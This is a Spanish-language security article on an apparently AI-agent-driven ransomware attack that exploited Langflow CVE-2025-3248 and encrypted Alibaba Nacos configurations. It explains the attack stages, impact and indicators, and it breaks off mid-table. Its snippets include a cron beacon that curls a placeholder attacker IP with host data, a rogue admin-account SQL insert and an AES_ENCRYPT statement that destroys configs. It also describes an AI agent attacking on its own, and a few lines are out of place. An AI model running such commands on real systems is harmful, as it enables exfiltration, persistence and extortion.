Introducción
Los equipos de seguridad y DevOps ya no enfrentan solo scripts de atacantes o herramientas automatizadas convencionales. En mayo de 2025, investigadores de Sysdig documentaron el primer caso documentado de un ataque de ransomware completamente automatizado por un agente de IA, bautizado como JadePuffer. Este incidente no solo destaca por el uso de inteligencia artificial para orquestar un ataque complejo, sino por su capacidad de adaptación en tiempo real, replicando el comportamiento de un operador humano al ajustar sus acciones según los errores y obstáculos encontrados.
El ataque comenzó con la explotación de CVE-2025-3248, una vulnerabilidad de ejecución remota de código (RCE) no autenticada en Langflow, un framework open-source para construir aplicaciones con modelos de lenguaje (LLM). Una vez dentro, el agente de IA no solo robó credenciales y escaló privilegios, sino que también enumeró servicios en la nube, pivotó a otros sistemas y finalmente cifró 1.342 configuraciones de Alibaba Nacos antes de dejar un mensaje de rescate. Lo más preocupante: el agente demostró capacidad de aprendizaje y ajuste, cambiando su estrategia en segundos para superar fallas.
Qué ocurrió
El ataque de JadePuffer siguió un flujo de cinco etapas automatizadas, desde el acceso inicial hasta la ejecución del ransomware, todo orquestado por un agente de IA basado en un modelo de lenguaje grande (LLM). Según el informe de Sysdig, el proceso incluyó:
- Reconocimiento y acceso inicial: El agente explotó CVE-2025-3248 en Langflow, un framework para construir aplicaciones con LLM. La vulnerabilidad permitía ejecución remota de código sin autenticación y fue parcheada por los desarrolladores el 1 de abril de 2025. Sin embargo, CISA ya la había marcado como explotada en ataques hacia finales de mayo de 2025, dirigidos a endpoints expuestos en internet.
- Movimiento lateral y recolección de información: Una vez dentro del sistema Langflow, el agente:
– Recopiló información del host (hostname, variables de entorno, archivos sensibles).
– Enumeró un almacén de objetos MinIO, ajustando sus solicitudes API en tiempo real. Por ejemplo, si una petición devolvía XML en lugar de JSON, el agente modificaba su lógica de parsing en la misma ejecución.
– Robó credenciales almacenadas en variables de entorno y archivos de configuración.
- Persistencia y beaconing: El agente configuró un trabajo cron que se comunicaba con la infraestructura del atacante cada 30 minutos, asegurando persistencia incluso si el proceso principal se reiniciaba.
- Pivoting a servicios críticos: Desde el host de Langflow, el agente accedió a un servidor MySQL en producción que ejecutaba Alibaba Nacos, un servicio de configuración y naming. Usó credenciales de root (cuya procedencia no pudo determinarse) para:
– Probar técnicas de escape de contenedores (container escape).
– Desplegar el payload de ransomware.
- Cifrado selectivo y extorsión: El agente cifró 1.342 configuraciones de servicios en Nacos usando la función
AES_ENCRYPT()de MySQL. Luego:
config_info, history).– Creó una tabla llamada README_RANSOM con:
– Una nota de rescate.
– Una dirección Bitcoin (de ejemplo, posiblemente extraída de datos de entrenamiento del LLM).
– Un contacto de Proton Mail.
– El mensaje afirmaba usar AES-256, pero los investigadores sospechan que en realidad se usó AES-128-ECB, un algoritmo más débil. Además, la clave de cifrado se generaba aleatoriamente pero no se almacenaba ni transmitía al atacante, lo que dificulta la recuperación de datos incluso si se paga el rescate.
Pruebas de la intervención de IA
Sysdig identificó múltiples señales que confirmaban la participación de un agente de IA:
- Comentarios en lenguaje natural en el código generado, describiendo la lógica operativa (ej: «Intentar escape de contenedor detectado, probar método alternativo»).
- Ajuste dinámico de parámetros: En un caso, el agente pasó de un login fallido a un vector de ataque funcional en 31 segundos, ajustando su payload según el error.
- Iteración rápida: Cambiaba de táctica ante errores específicos (ej: parseo XML vs JSON) en lugar de repetir intentos ciegos.
Impacto para DevOps / Infraestructura / Cloud / Seguridad
Para equipos de Seguridad (SOC, CERT, Red Teams)
- Nueva superficie de ataque: Los agentes de IA como JadePuffer reducen la barrera de entrada para ciberataques sofisticados. Según Sysdig, esto marca el inicio de la era de los «agentes de amenaza» (ATAs), donde un actor malicioso puede delegar tareas complejas a un LLM.
- Falta de cobertura actual: Solo el 54% de los ataques exitosos se logran registrar, y apenas el 14% generan alertas en los SOCs promedio. El resto pasa desapercibido, lo que hace crítico evaluar herramientas de simulación de brechas (Breach and Attack Simulation, BAS) para probar la eficacia de reglas de SIEM y detecciones en EDR.
- Nuevos indicadores de compromiso (IoC):
– Trabajos cron con comandos sospechosos (ej: conexiones a IPs desconocidas cada 30 minutos).
– Tablas MySQL con nombres como README_RANSOM o columnas AES_ENCRYPT().
Para equipos de DevOps e Infraestructura en la nube
- Exposición de credenciales: La enumeración de variables de entorno y archivos de configuración es una táctica recurrente. En este caso, el agente accedió a credenciales de Alibaba Nacos y posiblemente de otros servicios.
- Riesgo en frameworks de LLM: Langflow es solo un ejemplo; cualquier framework open-source para construir aplicaciones con IA podría ser un blanco. Equipos que usen PostgreSQL, MinIO, Kubernetes (EKS) o servicios de configuración como Nacos deben priorizar:
– Rotación automática de credenciales (secrets rotation).
– Segmentación de redes para limitar el movimiento lateral.
- Impacto en servicios críticos: CVE-2025-3248 afecta a Langflow, pero su impacto real se extiende a sistemas interconectados (ej: bases de datos MySQL, servicios de configuración como Nacos). Un ataque exitoso puede comprometer toda una arquitectura de microservicios.
Para equipos de Cloud (Kubernetes, bases de datos, VPN)
- Exposición en la nube: El ataque explotó un endpoint expuesto en internet. Empresas que usen EKS, servicios de almacenamiento como MinIO o bases de datos PostgreSQL/MySQL deben:
– Revisar políticas de firewall y reglas de seguridad en grupos de seguridad (Security Groups).
– Monitorear tráfico anómalo hacia/desde IPs desconocidas, especialmente en puertos no estándar usados por MinIO (9000/TCP) o bases de datos.
- Riesgo en Alibaba Nacos: CVE-2021-29441 (bypass de autenticación) permite crear cuentas de administrador falsas. Equipos que usen Nacos en Kubernetes o entornos híbridos deben:
– Auditar cuentas de administrador y credenciales por defecto.
Riesgo cuantitativo
- 1.342 configuraciones cifradas: Aunque el agente usó un algoritmo de cifrado débil (AES-128-ECB), el impacto en la operatividad del negocio puede ser crítico si esas configuraciones son centrales para servicios en producción.
- CTF Score: La dirección Bitcoin en la nota de rescate es un placeholder, pero el hecho de que aparezca sugiere que el LLM reprodujo datos de entrenamiento, lo que aumenta el riesgo de fugas de información sensible en futuros ataques.
- Tiempo de respuesta: El agente adaptó su estrategia en 31 segundos, lo que supera la capacidad de respuesta humana en entornos con alertas saturadas.
Detalles técnicos
CVE-2025-3248: La puerta de entrada
| Detalle | Valor |
|---|---|
| **Tipo** | Ejecución remota de código (RCE) no autenticada |
| **Componente afectado** | Langflow (versión afectada: < 0.7.0) |
| **Fecha de parcheo** | 1 de abril de 2025 |
| **Fecha de explotación confirmada** | Mayo 2025 (marcada por CISA como «explotada») |
| **Vector de ataque** | Endpoints expuestos en internet con configuraciones por defecto o débilmente protegidos |
| **Impacto** | Acceso inicial a hosts con credenciales de nube y API keys |
Tácticas, técnicas y procedimientos (TTPs) del agente de IA
- Reconocimiento adaptativo:
# Ejemplo de ajuste dinámico (simplificado)
if response.headers['Content-Type'] == 'application/xml':
parsear_xml(response.body)
else:
parsear_json(response.body)
– Esto demuestra capacidad de procesamiento contextual, similar a un operador humano.
- Persistencia con cron:
# Ejemplo de trabajo cron detectado (simplificado)
*/30 * * * * curl -s http://<IP_ATACANTE>/beacon --data "host=$(hostname)"
– El beacon se ejecutaba cada 30 minutos, exfiltrando información del host.
- Movimiento lateral a Alibaba Nacos:
-- Payload de explotación (simplificado)
INSERT INTO users (username, password, roles) VALUES ('admin2', 'password123', 'admin');
– Luego, enumeró y cifró configuraciones usando AES_ENCRYPT() de MySQL:
UPDATE config_info SET content = AES_ENCRYPT(content, 'clave_aleatoria');
- Cifrado de datos:
– Las claves se generaban aleatoriamente pero no se transmitían al atacante, lo que invalida la recuperación de datos incluso con el rescate pagado.
Indicadores de compromiso (IoC) clave
| Tipo | Valor | Herramienta sugerida de detección |
|---|---|---|
| **IP atacante** |
